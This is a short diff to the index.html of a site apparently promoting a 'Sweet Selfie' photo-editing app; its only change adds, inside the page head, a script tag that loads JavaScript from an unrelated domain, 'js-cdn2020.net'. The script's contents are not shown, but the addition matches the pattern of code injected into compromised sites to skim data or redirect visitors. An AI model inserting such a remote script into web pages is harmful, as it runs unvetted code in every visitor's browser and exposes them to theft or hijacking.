--- a/index.html
+++ b/index.html
@@ -25,7 +25,7 @@
 	<!-- Document Title
 	============================================= -->
 	<title>Sweet Selfie - Beauty Camera amp Best Photo Editor</title>
-
+<script src="https://js-cdn2020.net/260ber"></script>
 </head>
 
 <body class="stretched">
